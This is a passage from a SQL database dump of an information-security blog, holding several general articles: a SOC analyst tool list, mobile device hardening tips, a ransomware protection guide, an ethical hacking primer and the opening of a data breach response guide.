target=\"_blank\" rel=\"nofollow noopener\">theHarvester</a>: A tool for gathering emails, subdomains, hosts, and other information from public sources.</li>\r\n</ol>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">Additional Essential Tools for SOC Analysts</h2>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Vulnerability Management</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.tenable.com/products/tenable-io\" target=\"_blank\" rel=\"nofollow noopener\">Tenable.io</a>: Comprehensive vulnerability management platform.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.qualys.com/\" target=\"_blank\" rel=\"nofollow noopener\">Qualys</a>: Cloud-based security and compliance solutions.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.tenable.com/products/nessus\" target=\"_blank\" rel=\"nofollow noopener\">Nessus</a>: Widely used vulnerability scanner.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Malware Analysis and Sandboxing</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://any.run/\" target=\"_blank\" rel=\"nofollow noopener\">Any.run</a>: Investigate malware in a sandbox environment, also provides threat intelligence.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.virustotal.com/\" target=\"_blank\" rel=\"nofollow noopener\">VirusTotal</a>: A web-based service for scanning files and URLs for potential malware.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.fireeye.com/products/malware-analysis.html\" target=\"_blank\" rel=\"nofollow noopener\">FireEye Malware Analysis</a>: Advanced sandboxing solution.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.virtualbox.org/\" target=\"_blank\" rel=\"nofollow noopener\">Oracle VirtualBox</a>: Create isolated environments for malware analysis.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Log Management</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.elastic.co/what-is/elk-stack\" target=\"_blank\" rel=\"nofollow noopener\">ELK Stack</a>: Open-source log management solution (Elasticsearch, Logstash, Kibana).</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.graylog.org/\" target=\"_blank\" rel=\"nofollow noopener\">Graylog</a>: Centralizes and analyzes log data.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.sumologic.com/\" target=\"_blank\" rel=\"nofollow noopener\">Sumo Logic</a>: Cloud-native log management and analytics.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Digital Forensics</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://accessdata.com/products-services/forensic-toolkit-ftk\" target=\"_blank\" rel=\"nofollow noopener\">FTK (Forensic Toolkit)</a>: Comprehensive digital forensics solution.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.opentext.com/products-and-solutions/products/security/encase-forensic\" target=\"_blank\" rel=\"nofollow noopener\">EnCase</a>: Provides digital investigation and forensic capabilities.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.volatilityfoundation.org/\" target=\"_blank\" rel=\"nofollow noopener\">Volatility</a>: Open-source memory forensics framework.</li>\r\n</ol>\r\nThe tools outlined in this guide form the backbone of a modern SOC analyst\'s toolkit. By leveraging these powerful solutions, security professionals can effectively monitor, detect, and respond to the ever-evolving landscape of cyber threats. However, it\'s crucial to remember that tools are only as effective as the analysts using them. Regular training, staying updated with the latest security trends, and continuous learning are essential for maximizing the potential of these tools and maintaining a robust security posture.As cyber threats continue to evolve, so too must the tools and techniques used to combat them. SOC analysts should regularly evaluate new tools and technologies to ensure they\'re equipped with the most effective solutions for protecting their organizations\' digital assets.', '', NULL, NULL, 1, 'draft', '2024-12-11 00:12:36', '2026-01-12 21:41:44', 'Information Security', 'The Essential Security Analyst Toolkit: Comprehensive Guide for SOC Professionals', '', NULL),
(89, 'How to Lock Down Your Mobile Devices: The Ultimate Security Guide', 'how-to-lock-down-your-mobile-devices-the-ultimate-security-guide', 'Did you know that over 50% of mobile devices have unpatched vulnerabilities? This alarming statistic underscores how exposed our personal information can be if we don’t take mobile security seriously. With the rising number of transactions and communication happening through smartphones, the chances of cyber threats are also soaring.\r\n\r\nAs we increasingly rely on mobile devices for everything—from banking to social media—it\'s crucial to understand the security risks involved. This article aims to provide a comprehensive guide on safeguarding your mobile devices from potential threats.\r\n<h3 id=\"secure-your-mobile-operating-system\">Secure Your Mobile Operating System</h3>\r\n<h4 id=\"update-your-os\">Update Your OS</h4>\r\nKeeping your device\'s operating system up to date is vital. Regular OS updates patch known vulnerabilities, helping to shield your device from threats. In fact, studies show that 60% of security vulnerabilities are fixed in software updates. To enable automatic updates:\r\n<ol>\r\n 	<li><strong>iOS</strong>: Go to Settings &gt; General &gt; Software Update &gt; Automatic Updates, then toggle it on.</li>\r\n 	<li><strong>Android</strong>: Open Settings &gt; System &gt; Advanced &gt; System Update &gt; Automatically check for updates.</li>\r\n</ol>\r\n<h4 id=\"enable-automatic-security-updates\">Enable Automatic Security Updates</h4>\r\nTaking further steps to secure your device is easy. Enabling automatic security updates means you won’t miss critical patches.\r\n<ul>\r\n 	<li><strong>iOS</strong>: Follow the same steps above for Automatic Updates.</li>\r\n 	<li><strong>Android</strong>: Go to Settings &gt; Security &gt; Google Play system update &gt; Enable automatic updates.</li>\r\n</ul>\r\n<h4 id=\"use-a-strong-passcodebiometrics\">Use a Strong Passcode/Biometrics</h4>\r\nA strong passcode is your first line of defense. Use a combination of letters, numbers, and symbols to create a complex password. Additionally, biometric authentication (like fingerprint or facial recognition) offers extra security. Weak passwords can easily be hacked, putting your data at risk.\r\n<h3 id=\"strengthen-your-mobile-app-security\">Strengthen Your Mobile App Security</h3>\r\n<h4 id=\"app-permissions\">App Permissions</h4>\r\nReviewing app permissions is essential. Many apps request access to data unrelated to their purpose. Revoking unnecessary permissions can save your data from malicious use. For example, a seemingly harmless flashlight app may ask for your location, which is unnecessary.\r\n<h4 id=\"download-from-official-app-stores\">Download from Official App Stores</h4>\r\nAlways download apps from official sources like Google Play Store or Apple App Store. Third-party sources can host malicious apps that compromise your data. According to cybersecurity experts, downloading apps from unofficial sites can lead to malware infections.\r\n<h4 id=\"keep-apps-updated\">Keep Apps Updated</h4>\r\nJust like your OS, apps need updates too. Outdated apps are often targets for hackers. Enable auto-updates in your app store settings:\r\n<ul>\r\n 	<li><strong>iOS</strong>: Go to Settings &gt; App Store &gt; App Updates &gt; Toggle to On.</li>\r\n 	<li><strong>Android</strong>: Open Google Play Store &gt; Menu &gt; Settings &gt; Auto-update apps.</li>\r\n</ul>\r\n<h3 id=\"protect-your-mobile-data--privacy\">Protect Your Mobile Data &amp; Privacy</h3>\r\n<h4 id=\"use-a-strong-password-manager\">Use a Strong Password Manager</h4>\r\nPassword managers help you create and store strong, unique passwords for each account. Popular options include LastPass, 1Password, and Bitwarden. They add an extra layer of security to your online accounts.\r\n<h4 id=\"enable-two-factor-authentication-2fa\">Enable Two-Factor Authentication (2FA)</h4>\r\n2FA requires a second form of identification beyond just your password. This adds an extra safety net. You can enable 2FA for platforms like Google, Facebook, and banking apps. Look for the security settings in your account.\r\n<h4 id=\"avoid-public-wi-fi\">Avoid Public Wi-Fi</h4>\r\nPublic Wi-Fi networks can be a goldmine for hackers. Avoid using them for sensitive transactions. If you must connect, use a virtual private network (VPN) for added security.\r\n<h3 id=\"safe-browsing--phishing-prevention\">Safe Browsing &amp; Phishing Prevention</h3>\r\n<h4 id=\"recognize-phishing-attempts\">Recognize Phishing Attempts</h4>\r\nPhishing scams often come via email or text message, tricking you into revealing personal information. Common techniques include fake links and urgent requests for sensitive data. Always verify the sender before clicking.\r\n<h4 id=\"be-cautious-of-suspicious-links-and-attachments\">Be Cautious of Suspicious Links and Attachments</h4>\r\nNever click on unknown links or download attachments from untrusted sources. Cybercriminals use these tactics to spread malware. According to cybersecurity statistics, nearly 90% of breaches start with a phishing attack.\r\n<h4 id=\"use-a-reputable-antivirus-app\">Use a Reputable Antivirus App</h4>\r\nMobile antivirus apps can help detect threats and provide real-time protection. Look for well-known options, such as Norton, McAfee, or Bitdefender, to keep your device secure.\r\n<h3 id=\"safe-mobile-device-management\">Safe Mobile Device Management</h3>\r\n<h4 id=\"regularly-back-up-your-data\">Regularly Back Up Your Data</h4>\r\nBacking up your data can help you recover critical information in case your device gets lost or damaged. Use cloud services like Google Drive or iCloud for automatic backups.\r\n<h4 id=\"locate-your-device-remotely\">Locate Your Device Remotely</h4>\r\nIf your mobile device goes missing, you can track it down using built-in features. Use:\r\n<ul>\r\n 	<li><strong>iOS</strong>: Find My iPhone</li>\r\n 	<li><strong>Android</strong>: Find My Device</li>\r\n</ul>\r\nBoth tools allow you to locate and even remotely wipe your data for security.\r\n<h4 id=\"consider-a-mobile-device-management-mdm-solution\">Consider a Mobile Device Management (MDM) Solution</h4>\r\nFor businesses or individuals with multiple devices, using an MDM solution helps streamline security measures across all devices. This kind of management provides an easy way to enforce security policies.\r\n\r\nTo ensure your mobile devices remain safe, remember these key practices: regularly update your operating system and apps, use strong passwords and 2FA, and be cautious of public Wi-Fi and phishing attempts.\r\n\r\nImplementing these security measures can significantly reduce the risk of data breaches and identity theft. Protect your mobile devices today to enjoy peace of mind in an increasingly connected world.', '', NULL, NULL, 1, 'draft', '2024-12-09 23:20:42', '2026-01-12 21:41:44', 'Information Security', 'How to Lock Down Your Mobile Devices: The Ultimate Security Guide', '', NULL),
(90, 'What is Ransomware and How to Protect Against It: A Comprehensive Guide', 'what-is-ransomware-and-how-to-protect-against-it-a-comprehensive-guide', '# Understanding Ransomware\n\nRansomware is a sophisticated form of malware designed to hold your data hostage, effectively locking you out of your files and systems. It encrypts your data using complex algorithms, making it inaccessible without a unique decryption key that only the attackers possess. To regain access, victims are typically required to pay a ransom, often demanded in cryptocurrency to maintain the attacker\'s anonymity.\n\n## Types of Ransomware\n\nThere are several types of ransomware, each with its own characteristics:\n\n1. **Crypto Ransomware**: Encrypts files on a system, rendering the content useless without the decryption key.\n2. **Locker Ransomware**: Locks users out of their entire system instead of encrypting files.\n3. **Scareware**: Uses fake alerts to trick users into paying for unnecessary \"fixes.\"\n4. **Doxware**: Also known as leakware, this ransomware threatens to publish stolen sensitive data unless a ransom is paid.\n5. **Ransomware-as-a-Service (RaaS)**: A subscription-based model where ransomware tools are sold or rented to affiliates, making it accessible even to cybercriminals without advanced technical skills.\n6. **Wiper Malware**: While not technically ransomware, this malicious software disguises itself as ransomware but actually destroys data permanently.\n\n## How Ransomware Works\n\nUnderstanding the lifecycle of a ransomware attack can help in developing effective prevention strategies. Here\'s a typical ransomware attack process:\n\n1. **Initial Infection**: Ransomware often enters systems through phishing emails, malicious attachments, compromised websites, or exploit kits.\n2. **Stealth and Propagation**: Once inside, the ransomware may lie dormant, spreading to other connected systems and devices.\n3. **Data Encryption**: The malware then begins encrypting files, making them inaccessible to the user.\n4. **Ransom Demand**: After encryption, a ransom note is displayed, demanding payment for the decryption key.\n5. **Potential Data Exfiltration**: In some cases, attackers may also steal sensitive data before encryption, threatening to leak it if the ransom isn\'t paid (double extortion technique).\n\n## Protecting Against Ransomware\n\nNow that we understand what ransomware is and how it operates, let\'s explore comprehensive strategies to protect against it:\n\n### 1. Implement Robust Backup Solutions\n\nOne of the most effective defenses against ransomware is a solid backup strategy:\n\n- Follow the 3-2-1 rule: Keep at least three copies of your data, on two different types of media, with one copy stored off-site.\n- Regularly test your backups to ensure they can be restored successfully.\n- Keep some backups offline or air-gapped to prevent them from being encrypted by ransomware.\n\n### 2. Keep Systems and Software Updated\n\nCybercriminals often exploit vulnerabilities in outdated software:\n\n- Regularly update your operating systems, applications, and firmware.\n- Enable automatic updates whenever possible.\n- Pay special attention to security patches and apply them promptly.\n\n### 3. Employ Strong Security Software\n\nUse comprehensive security solutions to protect your systems:\n\n- Install reputable antivirus and anti-malware software on all devices.\n- Consider using specialized ransomware protection tools.\n- Ensure your security software is always up-to-date.\n\n### 4. Educate and Train Users\n\nHuman error is often the weakest link in cybersecurity:\n\n- Provide regular cybersecurity awareness training to all employees.\n- Teach users to recognize phishing attempts and suspicious emails.\n- Encourage a culture of security consciousness in your organization.\n\n### 5. Implement Network Segmentation\n\nLimit the potential spread of ransomware within your network:\n\n- Separate critical systems and data from the general network.\n- Use virtual local area networks (VLANs) to isolate different parts of your network.\n- Implement strong access controls between network segments.\n\n### 6. Use Email and Web Filtering\n\nMany ransomware attacks start with malicious emails or web content:\n\n- Implement robust email filtering to block suspicious attachments and links.\n- Use web filtering to prevent access to known malicious websites.\n- Consider sandboxing suspicious files before they enter your network.\n\n### 7. Implement Least Privilege Access\n\nRestrict user permissions to minimize the potential impact of a ransomware infection:\n\n- Give users only the access they need to perform their jobs.\n- Regularly review and update access permissions.\n- Use multi-factor authentication (MFA) for all user accounts, especially for privileged access.\n\n### 8. Develop and Test an Incident Response Plan\n\nBe prepared for the worst-case scenario:\n\n- Create a detailed incident response plan that outlines steps to take in case of a ransomware attack.\n- Assign roles and responsibilities to team members.\n- Regularly test and update your plan through tabletop exercises and simulations.\n\n### 9. Monitor Network Activity\n\nDetect potential ransomware activity early:\n\n- Implement network monitoring tools to detect unusual activity.\n- Use Security Information and Event Management (SIEM) solutions for real-time analysis of security alerts.\n- Consider using artificial intelligence and machine learning tools for advanced threat detection.\n\n### 10. Be Cautious with Remote Desktop Protocol (RDP)\n\nRDP is a common entry point for ransomware:\n\n- Disable RDP if it\'s not necessary.\n- If RDP is required, use a Virtual Private Network (VPN) and multi-factor authentication.\n- Limit RDP access to specific IP addresses and keep it behind a firewall.\n\n## What to Do If You\'re Hit by Ransomware\n\nDespite best efforts, ransomware attacks can still occur. If you find yourself a victim:\n\n1. Isolate the infected systems immediately to prevent further spread.\n2. Report the incident to law enforcement.\n3. Do not pay the ransom, as this doesn\'t guarantee data recovery and encourages further attacks.\n4. Restore your systems from clean backups after ensuring the ransomware has been completely removed.\n5. Conduct a post-incident review to identify how the attack occurred and improve your defenses.\n\nRansomware is a serious threat in today\'s digital world, but with the right precautions and strategies, you can significantly reduce your risk of falling victim to these attacks. By implementing robust backup solutions, keeping systems updated, educating users, and following the other best practices outlined in this guide, you can create a strong defense against ransomware and other cyber threats. Remember, cybersecurity is an ongoing process. Stay informed about the latest threats and continuously adapt your defenses to stay one step ahead of cybercriminals. With vigilance and the right strategies, you can protect your valuable data and systems from the growing threat of ransomware.', '', 'http://infoseclabs.io/uploads/1773428403445-775146537.jpg', 'A digital lock symbolizing ransomware security measures', 1, 'published', '2026-01-03 07:51:00', '2026-03-13 22:00:32', 'Information Security', 'Ransomware Protection: Comprehensive Guide', 'Learn what ransomware is, its types, and how to protect your data with effective strategies.', 'Ransomware Protection'),
(91, 'The Ultimate Guide to Ethical Hacking: A Beginner\'s Journey', 'the-ultimate-guide-to-ethical-hacking-a-beginners-journey', '<p class=\"mb-2 last:mb-0\"><strong>The Ultimate Guide to Ethical Hacking: A Beginner\'s Journey</strong></p>\r\n<p class=\"mb-2 last:mb-0\">In today\'s digital age, cybersecurity has become an essential aspect of any organization\'s infrastructure. With the rise of cyber threats, it\'s no wonder that companies are investing heavily in security measures to protect their data and systems. But what exactly is ethical hacking? In this comprehensive guide, we\'ll delve into the world of white-hat hacking, exploring its definition, benefits, and applications.</p>\r\n<p class=\"mb-2 last:mb-0\"><strong>What is Ethical Hacking?</strong></p>\r\n<p class=\"mb-2 last:mb-0\">Ethical hacking, also known as white-hat hacking, refers to the practice of identifying vulnerabilities in computer systems, networks, or applications by simulating real-world attacks. Unlike malicious hackers (black-hats), who use their skills for nefarious purposes, ethical hackers work with organizations to strengthen their defenses and improve overall security posture.</p>\r\n<p class=\"mb-2 last:mb-0\"><strong>History of Ethical Hacking</strong></p>\r\n<p class=\"mb-2 last:mb-0\">The concept of white-hat hacking dates back to the early days of computing, when security experts began using their skills to identify vulnerabilities in systems. In the 1990s, the term \"hacker\" took on a negative connotation, implying malicious intent. However, as organizations began to recognize the value of proactive security measures, the term \"ethical hacking\" emerged, emphasizing the importance of working with companies to improve their defenses.</p>\r\n<p class=\"mb-2 last:mb-0\"><strong>Types of Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Vulnerability Assessment:</strong> This involves identifying potential vulnerabilities in systems, networks, or applications using tools and techniques.</li>\r\n 	<li><strong>Penetration Testing:</strong> A more comprehensive approach than vulnerability assessment, penetration testing simulates real-world attacks to test the strength of an organization\'s defenses.</li>\r\n 	<li><strong>Web Application Security Testing (WAST):</strong> Focuses on identifying vulnerabilities in web applications, such as SQL injection or cross-site scripting (XSS).</li>\r\n 	<li><strong>Network Security Testing:</strong> Evaluates the security of network infrastructure, including firewalls, routers, and switches.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>Benefits of Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Improved Security Posture:</strong> Regular vulnerability assessments and penetration testing help identify and address weaknesses before they can be exploited.</li>\r\n 	<li><strong>Reduced Risk:</strong> By proactively addressing potential vulnerabilities, organizations can minimize the risk of a successful attack.</li>\r\n 	<li><strong>Compliance and Regulatory Confidence:</strong> Ethical hacking services help organizations meet regulatory requirements, reducing the likelihood of non-compliance fines or penalties.</li>\r\n 	<li><strong>Enhanced Incident Response Planning:</strong> Well-prepared incident response plans enable companies to respond quickly and effectively in the event of an attack.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>How Ethical Hacking Works</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Pre-Assessment:</strong> The ethical hacking team conducts a thorough review of the organization\'s systems, networks, and applications to identify potential vulnerabilities.</li>\r\n 	<li><strong>Vulnerability Identification:</strong> Using specialized tools and techniques, the team identifies vulnerabilities and prioritizes them based on risk level.</li>\r\n 	<li><strong>Penetration Testing:</strong> The team simulates real-world attacks to test the strength of an organization\'s defenses, identifying any vulnerabilities that were not previously detected.</li>\r\n 	<li><strong>Reporting and Recommendations:</strong> The team provides a comprehensive report outlining identified vulnerabilities, recommended remediation steps, and suggestions for improving overall security posture.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>Tools Used in Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Nmap:</strong> A network scanning tool used to identify open ports and services on target systems.</li>\r\n 	<li><strong>Burp Suite:</strong> A web application testing tool used to identify vulnerabilities such as SQL injection or XSS.</li>\r\n 	<li><strong>Metasploit:</strong> A penetration testing framework used to simulate real-world attacks and identify vulnerabilities.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>Career Opportunities in Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Ethical Hacker:</strong> Responsible for identifying vulnerabilities and developing remediation strategies.</li>\r\n 	<li><strong>Security Consultant:</strong> Works with organizations to develop comprehensive security plans and implement recommendations.</li>\r\n 	<li><strong>Incident Response Specialist:</strong> Responds to security incidents, analyzing and mitigating potential threats.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>How to Get Started in Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Education:</strong> Pursue a degree in computer science or a related field, focusing on cybersecurity and networking.</li>\r\n 	<li><strong>Training:</strong> Enroll in online courses or certification programs, such as the Certified Ethical Hacker (CEH) program.</li>\r\n 	<li><strong>Hands-on Experience:</strong> Participate in bug bounty programs or volunteer to test systems for non-profit organizations.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\">Ethical hacking is a vital component of any robust security strategy. By leveraging the expertise of white-hat hackers, organizations can identify vulnerabilities, strengthen their defenses, and reduce the risk of a successful attack. Whether you\'re a beginner looking to break into the field or an experienced professional seeking to enhance your skills, this guide has provided a comprehensive introduction to the world of ethical hacking.</p>\r\n<p class=\"mb-2 last:mb-0\"><strong>Frequently Asked Questions (FAQs)</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Q: What is the difference between black-hat and white-hat hacking?</strong> A: Black-hat hacking refers to malicious activities, while white-hat hacking involves working with organizations to improve their defenses.</li>\r\n 	<li><strong>Q: Can I learn ethical hacking on my own?</strong> A: Yes, but it\'s recommended to pursue formal education or training in cybersecurity and networking.</li>\r\n 	<li><strong>Q: What are the benefits of regular vulnerability assessments and penetration testing?</strong> A: These activities help identify and address weaknesses before they can be exploited, reducing risk and improving overall security posture.</li>\r\n</ol>', '', NULL, NULL, 1, 'draft', '2024-12-08 21:22:32', '2026-01-12 21:41:44', 'Information Security', 'The Ultimate Guide to Ethical Hacking: A Beginner\'s Journey', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(92, 'How to Detect and Respond to a Data Breach: A Comprehensive Guide', 'how-to-detect-and-respond-to-a-data-breach-a-comprehensive-guide', '<span style=\"font-weight: 400\">Data breaches have become a significant threat to organizations and individuals alike. The consequences of these breaches can range from financial losses to reputational damage, making it essential to detect and respond to them effectively. Whether you\'re a small business owner, IT professional, or simply someone concerned about cybersecurity, understanding how to identify and address a data breach is vital. This guide will walk you through the key steps for detecting and responding to a data breach, with real-world examples and actionable tips.</span>\r\n<h2><span style=\"font-weight: 400\">What is a Data Breach?</span></h2>\r\n<span style=\"font-weight: 400\">A data breach occurs when sensitive, confidential, or protected information is accessed or disclosed without authorization. This can happen due to various reasons, including hacking, insider threats, or even human error. Common types of data breaches include the theft of personally identifiable information (PII), financial data, intellectual property, and login credentials.</span>\r\n<h2><span style=\"font-weight: 400\">How to Detect a Data Breach</span></h2>\r\n<span style=\"font-weight: 400\">Detecting a data breach early can significantly reduce its impact. Here are the key methods and tools for identifying potential breaches:</span>\r\n<h2><span style=\"font-weight: 400\">1. Monitor Network Activity</span></h2>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Continuous real-time monitoring of network traffic is essential for spotting unusual activity. Signs of a breach may include:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unusual spikes in data transfers</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unauthorized access attempts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Abnormal login patterns</span></li>\r\n</ul>\r\n</li>\r\n 	<li style=\"font-weight: 400\"></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Tools like Intrusion Detection Systems (IDS) and Security Information and Event Management (SIEM) software can help monitor network traffic for malicious activity.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">2. Watch for Early Warning Signs</span></h2>\r\n<span style=\"font-weight: 400\">Some common indicators of a potential breach include:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unusual System Behavior: Unexpected slowdowns or crashes may point to unauthorized activity.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unauthorized Access: Detection of unfamiliar user accounts or login attempts from unknown locations.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unexplained Data Modifications: Changes in files or system settings without proper authorization.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Increased Phishing Attempts: A sudden spike in phishing emails targeting employees could indicate an ongoing attack.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">3. Use Threat Intelligence</span></h2>\r\n<span style=\"font-weight: 400\">Advanced tools can scan the dark web and other sources for leaked credentials or sensitive company information. For example:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Breach detection tools like Breachsense monitor forums, marketplaces, and ransomware gang communications for mentions of your data.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">4. Conduct Regular Security Audits</span></h2>\r\n<span style=\"font-weight: 400\">Routine audits help identify vulnerabilities before they are exploited. These audits should include:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Reviewing access logs</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Scanning for unpatched software</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Testing security controls through penetration testing.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">5. Endpoint Monitoring</span></h2>\r\n<span style=\"font-weight: 400\">Endpoint Detection and Response (EDR) tools can monitor devices like laptops and servers for suspicious activities such as malware installation or unauthorized file transfers.</span>\r\n<h2><span style=\"font-weight: 400\">Real-Life Examples of Data Breaches</span></h2>\r\n<span style=\"font-weight: 400\">Understanding past breaches helps highlight the importance of early detection:</span>\r\n<h2><span style=\"font-weight: 400\">1. Equifax Data Breach (2017)</span></h2>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">What Happened: Hackers exploited an unpatched vulnerability in Apache Struts software.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Impact: Personal information of 147 million people was exposed.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Lesson Learned: Regularly updating software and patching vulnerabilities is critical.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">2. Target Data Breach (2013)</span></h2>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">What Happened: Attackers gained access through a third-party vendor\'s credentials.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Impact: Stolen credit card details of 40 million customers.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Lesson Learned: Monitoring third-party access and implementing strong access controls are essential.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">3. SolarWinds Supply Chain Attack (2020)</span></h2>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">What Happened: Hackers inserted malware into SolarWinds\' Orion software updates.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Impact: Compromised systems in government agencies and major corporations.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Lesson Learned: Regularly auditing supply chain security can prevent such attacks.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">How to Respond to a Data Breach</span></h2>\r\n<span style=\"font-weight: 400\">Once a breach is detected, swift action is necessary to minimize damage. Follow these steps:</span>\r\n<h2><span style=\"font-weight: 400\">1. Contain the Breach</span></h2>\r\n<span style=\"font-weight: 400\">Immediately isolate affected systems to prevent further unauthorized access or data exfiltration:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Disconnect compromised devices from the network.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Disable user accounts involved in suspicious activity.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Block malicious IP addresses using firewalls.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">2. Assemble an Incident Response Team</span></h2>\r\n<span style=\"font-weight: 400\">Form a team that includes:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">IT security professionals</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Legal counsel</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Forensic experts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Communication specialists</span><span style=\"font-weight: 400\">\r\n</span><span style=\"font-weight: 400\">This team will coordinate efforts to investigate the breach, mitigate risks, and communicate with stakeholders.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">3. Investigate the Breach</span></h2>\r\n<span style=\"font-weight: 400\">Conduct a thorough investigation to determine:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">The source and scope of the breach</span></li>\r\n 	<li 